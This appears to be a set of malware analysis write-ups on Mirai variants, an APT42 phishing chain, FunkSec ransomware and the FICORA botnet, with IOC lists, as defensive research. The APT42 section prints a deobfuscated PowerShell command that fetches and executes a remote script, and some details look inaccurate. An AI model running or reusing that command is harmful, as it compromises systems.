Mirai botnet among different instruction sets: x86, ARM, PPC, and MIPS with static analysis

 

Summary

Mirai botnet family first discovered in 2016, the botnet will look for devices of IoT with scanner which embedded a dictionary for brute force attack and vulnerabilities exploit, and can do a DDoS attack like TCP flood and UDP flood and so on, later on, the source code distributed in github and different variants came from that time, nowadays, botnet is big challenging and threat to IoT, it is worthy doing research with different instruction sets, this report come here for a new try and let’s do it.

 

 

Technical analysis

 

This botnet is the ELF for Intel 386 (executable).

The hash

MD5: 6950F28382D7F11E18BDF53F3983117B

The load segment displays lots of source files that can help analysts to learn from which source code is being included and infer the main function of malware, likely with the source file “kill.c” to tell the analyst it may use the kill command to stop the process and “socket.c,” which can be used for malware to connect to the network.

Figure1-Source File List

Figure2-Kill Pid

 

The botnet at the part of initConnection connects to the server and port with plain text “31.172.87.248:12345,” and then goes to sleep and receives the command from the server and starts the attack DDoS module with processCmd, which supports TCP flood and UDP flood and so on, and stops the process.

Figure3- InitConnection To Server

Figure4- ProcessCmd With DDoS

Figure5-The Type Of ProcessCmd And Stop Process

 

TCP flood supports SYN, RST, FIN, ACK and PUSH.

Figure6-TCP Flood

 

The getPortz function checks for the existence of Python, Python3, and Perl binaries. If any exist, it returns."22" If none exist but /usr/sbin/telnetd is missing, it returns. "Unknown Port", Otherwise, it defaults to "22".

Figure7-GetPortz

The version of the botnet seems to be focused on starting an attack with DDoS, not to do cracking with a dictionary for telnet, and not to use any vulnerability to exploit.

 

 

This botnet is the ELF for ARM (Executable) in 32-bit.

The hash

MD5: 8ECAFDA00F1F5E5F8E94A10BB94D79B3

 

The load segment does not display any source files list and the function list without any useful information for analysts; it will take more time to dive deeply into the botnet when doing static analysis.

Figure8-Function Name About The ELF For ARM

 

The botnet embedded CVE-2017-17215 vulnerability exploited Huawei products and used command injection to implant malware, likely with downloading botnets for expanding the attack surface.

Figure9- CVE-2017-17215

 

The botnet embedded a dictionary to do a brute force attack.

Figure10-A Dictionary For Brute Force

 

The botnet kills other processes without plain text list, linux_eabi_syscallis an assembly-level mechanism for invoking system calls on ARM architectures, and the number is 37.

Figure11-Kill Other Process

 

The botnet changes the process to hide the real process for the anti-killing virus, which was running on the victim host.

Figure12-Change The Real Process

This version of the botnet with ARM architectures seems a bigger challenger than x86 architectures.

This botnet is the ELF for PowerPC (Executable) in 32-bit.

The hash

MD5: C6F057C974B24F6ABDAC5B76B10040B9

 

The load segment only displays “ppc-asm.h” include list and the function list without any useful information for analysts; 

Figure13-Load Segment

 

Using the crontab to execute a task with “bot.conf” file and make the botnet running as service. 

Figure14- Crontab And Service

 

The botnet kills other processes without plain text list, linux_syscall an assembly-level mechanism for invoking system calls on ARM architectures, and the number is 37.

Figure15-Kill Other Process

 

The botnet changes the process to hide the real process for the anti-killing virus, which was running on the victim host.

Figure16- Change The Real Process

 

This version of botnet without brute force attack and vulnerability exploited.

This botnet is the ELF for MIPS (Executable) in 32-bit.

The hash

MD5: CE6B524DB5612552294B5661EFFED7BD

 

The load segment does not display any source files list and the function list without any useful information for analysts; it will take more time to dive deeply into the botnet when doing static analysis.

Figure17-Function Name About The ELF For MIPS

 

The entry of variant of MIRAI is still very clearly, the function sub_40BA5C is main routing.

Figure18-The Entry

 

A dictionary is embedded for brute force in MIPS architectures like the following.

Figure19- Brute Force

 

In MIPS, the number of system calls begins at 4000, and “__asm { syscall }” is an inline assembly instruction that invokes a system call, the number 4170 is short for socket connection.

Figure20-Snippet For Connect

 

Username and password had been obfuscated with XOR, and the key was 0x37.

Figure21-Xor Algorithm

 

The IP address “41.216.189.127” is a fake IP, which will be changed by the sub_413780 function in order to hide the real server.

Figure22- sub_413780 Change Fade IP Address

 

The new variant uses double obfuscation to encode strings; it makes analysis more challenging. Maybe it will appear with multiple obfuscation techniques for anti-analysis.

Figure23-Double obfuscation

 

Obviously, the variant of Mirai botnet in MIPS architectures to do static analysis is a big challenge because of its policy of obfuscation.

 

 

 

ICOs

6950F28382D7F11E18BDF53F3983117B

8ECAFDA00F1F5E5F8E94A10BB94D79B3

C6F057C974B24F6ABDAC5B76B10040B9

CE6B524DB5612552294B5661EFFED7BD

 

Conclusion

From the above static analysis, we can get very limited knowledge about the Mirai botnet with different architectures, especially since they are a big challenge by obfuscation technique, although we can find the main routing or basic structure of botnet to go forward, but it still takes us more time and energy for the whole process of analysis.

 End.

APT42 phishing campaigns and malicious code like soldiers hiding deep in the jungle

 

Summary

I recently noted that the Google Threat Analysis Group was sharing insights on APT42. During 2024, I pay more attention to APT groups doing phishing around the world; of course, as you know, LNK is the type of phishing for delivering malware and has been popular for the past many years, and PowerShell is also now very popular for making malware. So here it is that I want to analyze the sample of APT42 that was shared by TAG.

 

Technical analysis

 

The hash sha256 c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

Link information for property store data block.

Figure1- Link Information For Property

 

Extract a long string that appears obfuscated is “C:\Windows\System32\cmd.exe /c "set mv=popdsxwerpdsxshpdsxell -wpdsx pdsx1 "$epdsxs=(wgepdsxt -Urpdsxi  https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicpdsxParsing).Content;&(gcm i?x)$es" & call %mv:pdsx=%".

String Replacement: %mv:pdsx=% replaces all instances of pdsx the mv variable with an empty string.

Resulting String: After replacement, mv likely contains.

“powershell -w 1  "$es=(wget -Uri https://s3.tebi.io/erfs/pf2ncy.txt -UseBasicParsing).Content;&(gcm i?x)$es"

By using it -w 1 to hide the PowerShell window.

Obfuscation: The use of gcm i?x and other obfuscations is likely intended to hide the true purpose of the code, making it more difficult to analyze and detect, in fact to execute the downloaded command via Invoke-Expression.

Conclusion: The LNK file will get malware from a remote machine https[:]//s3.tebi.io/erfs/pf2ncy.txt and execute a malicious payload.

 

 

The hash sha256 33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

Obviously, this is a PowerShell script; at the beginning, it starts to open a link.

“https[:]//onedrive.live.com/embed?resid=204D6029500397E2%21127&authkey=!AOecuKGAdx__SEQ&em=2”

in Microsoft Edge, likely with a specific OneDrive file that talked about “the war between Hamas and Israel” to attract victim attention and disguise the aim of the malware operator.

Figure2- the war between Hamas and Israeli snippet

 

It is a very special and interesting thing that this mess of including three random PowerShell variables is defined without any real meaning; it tries to do so intentionally, interfering with analyst analysis. The real and valid malicious code was embedded in them, just like soldiers hiding deep in the jungle. 😇

Figure3-malicious code likely with Soldiers hiding deep in the jungle

 

 

Extract the real code from the chaotic code, likely by finding out the soldiers, and finally the malicious code includes three Parts. We will talk about them, followed closely.

Figure4-the main malicious code

 

 

The bbsert function takes in a base64-encoded string, decodes it, and converts it from a byte array into a UTF-8 string.The malicious strings:

'iltaHR0cHM6Ly9taXhlZGludGVnZXJsaW5lYXIuYmFyYmFy

YS1kZC1wYWRyb24ud29ya2Vycy5kZXY=' decodes to the URL https://mixedintegrgermlbarara-dd-pardonworkers.dev. Malicious payload downloaded from the URL and finally executed by the function Gorba with a parameter, a long string value given seems like public key. Yeah, you may note the custom function Keymaster which came from another PowerShell file, the hash sha256

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f, this is PowerShell only for custom function Keymaster, which accecpted a parameter and use FromBase64String and AES to decrypt and replace special strings like “_____dest_____”.

Figure5-Keymaster

 

 

The hash sha256 c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

It is a PowerShell script that has the ability to download files and extract DLLs and ZIPs, grant permissions, start processes or services, use terminal services, create users, configure firewalls, establish SSH tunnels, and so on, which can be identified as a Trojan.

Figure6-PowerShell Trojan

 

 

IOCs

c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3

33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156

c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32

4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f

 

hxxps://s3api.shop/api/termsrvx64.zip

hxxps://s3api.shop/api/sfile.zip

hxxps://s3api.shop/api/sconfig.zip

hxxps://s3api.shop/api/vmspolicyservice.zip

hxxps://s3api.shop/api/btnsendngip2024.php

hxxps://mixedintegrgermlbarara-dd-pardonworkers.dev

hxxps://s3.tebi.io/erfs/pf2ncy.txt

hxxps://translatorupdater.dns-dynamic.net

End.

FunkSec Ransomware and Rust Reverse Analysis

Summary

From the checkpoint research, the FunkSec ransomware group first emerged publicly in late 2024 and rapidly gained prominence by publishing over 85 claimed victims—more than any other ransomware group in the month of December. I did research with a shared sample.

 

Technical Analysis

 

FunkSec Ransomware is named by the binary inside strings “funksec.pdb,” its extension “.funksec,” and ransom note, written in the Rust computer language and run on Windows and compiled in the environment of “C:\\Users\\Abdellah\\.cargo\\...,” with the time date stamp “2024-12-31 20:26:29,” AMD64 Architecture, without a packer. And "This program requires administrator privileges."

Figure1-Binary Information

Figure2-Ransomware Note Snippet 

Like the other ransom group, it generated a special readme file as a ransom note to tell the victim about “stop” and “what happened,” including what the bitcoin wallet address is, how to buy bitcoin, how much bitcoin to pay, and the contact ID. The special thing is about the “estimated time for data recovery.” A lot of malware samples I did research on, and I had found this tip; it gives the good feeling for their professional and advanced group, and don’t forget to tell people “who they are” as AD. In addition to supporting three onion websites to visit.

Figure3-Ransomware Note Snippet

 

FunkSec ransomware supports downloading remote JPEG images to change wallpaper from the URL “https[:]//i.imgur.com/HCYQoVR.jpeg.”This link can still be accessed and downloaded until “2025/1/22.” The JPG image has the following words.

Firgure4-Wallpaper

 

The binary first tries to use “net session” to check whether it can elevate privileges (the net session command requires administrative privileges to run successfully); if not, it will attempt to use the PowerShell command “Start-Process” to launch itself with elevated privileges.

Figure5- Net session and Start-Process

 

FunkSec ransomware encrypted the file and deleted the original file.

Figure6-Tip for “Encrypted and deleted file”

 

 Like most ransomware, FunkSec also has its own main control flow, but it seems to be more carefully analyzed because it has deep and extensive branches, which means that you need more time and energy to focus on the whole process of analysis. The key is you have to find the entry of the main control flow.

Figure7-The Entry Of Main Control Flow

 

One of the main control flows is as follows.

1. To create a README file that is the ransomware note.

2. To use “net session” to check whether it can elevate privileges

3. To download an image from the website address to change wallpaper

4. To try to run with administrator privileges

5. To get USERPROFILE

6. To encrypt and delete a file (ignore attention to encryption methods).

 

IOCs

2456fdd65bc48203815f22e444d78fb0

https[:]//i.imgur.com/HCYQoVR.jpeg

108[.]160[.]163[.]117

 

Threat Intelligence

Bitcoin wallet address:

bc1qrghnt6cqdsxt0qmlcaq0wcavq6pmfm82vtxfeq

Decryptor file fee:  0.1 BTC

 

Three onion websites:

funkiydk7c6j3vvck5zk2giml2u746fa5irwalw2kjem6tvofji7rwid.onion

funknqn44slwmgwgnewne6bintbooauwkaupik4yrlgtycew3ergraid.onion

funkxxkovrk7ctnggbjnthdajav4ggex53k6m2x3esjwlxrkb3qiztid.onion

 

ransomware note:

End.

Mirai: An IoT DDoS Botnet How To Protect and Disguise Itself As Aggressive Attacker Analysis

 

Summary

Since 2016, when the Mirai source code was published, similar family botnets have emerged; more and more botnets have appeared. and IoT security has become a big challenge. That makes me care about botnet development and do research. Recently, Mirai attracts me again; I like to do analysis with it in a different way, so here it is.

 

Analysis

 

Protect and Disguise Itself

Like any other malware that does anti-debug from an analyst, Mirai uses the function anti_gdb_entry with one parameter to monitor gdb debug. If it discovers debugging, it executes the function unlink to delete itself and tries to prevent the watchdog from rebooting the device and keep itself running all the time, not offline.

Figure1-anti-debug, delete self and keeping running

 

Using a random string which the length can be either 12, 16, 20, or 24 as name of processes and execute util_strcpy function for copying string to args[0] and hiding a real name.

Figure2-Hide argv0

 

Using a random string with the number from 12 to 32 as the name of processes and executing the prctl function for changing the name of a process.

Figure3-Hide process name

 

 

Aggressive Attacker

Mirai kills known anime botnet processes in order to ensure it is the only executing on the victim host or compromise IoT devices.

Figure4-kill anime botnet

 

Mirai kills telnet, SSH, and HTTP services and prevents them from restarting and also prevents the other botnet's attempt.

Figure5-kill tcp/23 telnet

 

More advanced technology is used to check and kill the other malware binary in memory.

Figure6 scan in memory for binary

 

 IoCs

6cd85642bc8cedc2a4b0611aaf2ace54

End.

Botnet continue to exploit vulnerabilities and FICORA botnet analysis

 

Summary

 

Back to December 26, 2024, FortiGuard Labs noticed a new variant called "FICORA" frequently spread through documented D-Link vulnerabilities that allow remote attackers to execute malicious commands like downloading malware, brute force attacks, and DDoS flooding attacks on victim hosts.

 

Analysis

 

Why call the botnet named “FICORA”?

FICORA bot named from malware inside strings

Figure1- special strings

 

The shell script executes multiple strategies, such as wget, ftpget, tftp, and curl, to get malware FICORA.

Figure2-downloader with multiple strategies for get malware

 

 

The shell script kills all processes with the same file extension.

Figure3-downloader with kill -9 command

 

The shell script tries to find and kill any process containing the keyword “dvrHelper,” which can decode from hex to strings; below is a small part.

Figure4- malware inside hexadecimal script

Figure5- malware inside script with plain text

 

Yeah, as you know, like “Mirai” family Botnet loader binary bin file that contains the keyword “dvrHelper” as follows.

Figure6-loader bin like dlr.arm7

 

Brute force attacking in “FICORA” with embedded username and password list.

Figure7-  Brute force attack function with embedded username and password

 

 

And default username and password embedded in malware, FICORA and Mirai are very similay.

 

Figure8-username and password compare

 

FICORA and Mirai have multiple similary structure.

 

Figure8-structure compare

Figure9-structure compare

 

 

Compare the malware “FICORA” to Mirai, It can be identified by its similar architecture like “attack_method_udpplain”, the similarity is 53% and the confidence is 64%.

Figure10-DDoS in udp

 

IOCs

 

downloader md5 cb9f5c8892bffc28f6c12f11d60f5c92

downloader URL

hxxp://103[.]149[.]87[.]69/multi
hxxp://103[.]149[.]87[.]69/la.bot.arc
hxxp://103[.]149[.]87[.]69/la.bot.arm
hxxp://103[.]149[.]87[.]69/la.bot.arm5
hxxp://103[.]149[.]87[.]69/la.bot.arm6
hxxp://103[.]149[.]87[.]69/la.bot.arm7
hxxp://103[.]149[.]87[.]69/la.bot.m68k
hxxp://103[.]149[.]87[.]69/la.bot.mips
hxxp://103[.]149[.]87[.]69/la.bot.mipsel
hxxp://103[.]149[.]87[.]69/la.bot.powerpc
hxxp://103[.]149[.]87[.]69/la.bot.sh4
hxxp://103[.]149[.]87[.]69/la.bot.sparc

 

FICORA md5 233A1A71307FD7CA5946D90D6977E97A

 

Conclusion

It is very high confident that the malware “FICORA” can be belong to a variant of the Mirai family malware. It can be identified by its multiple similar architecture.

End.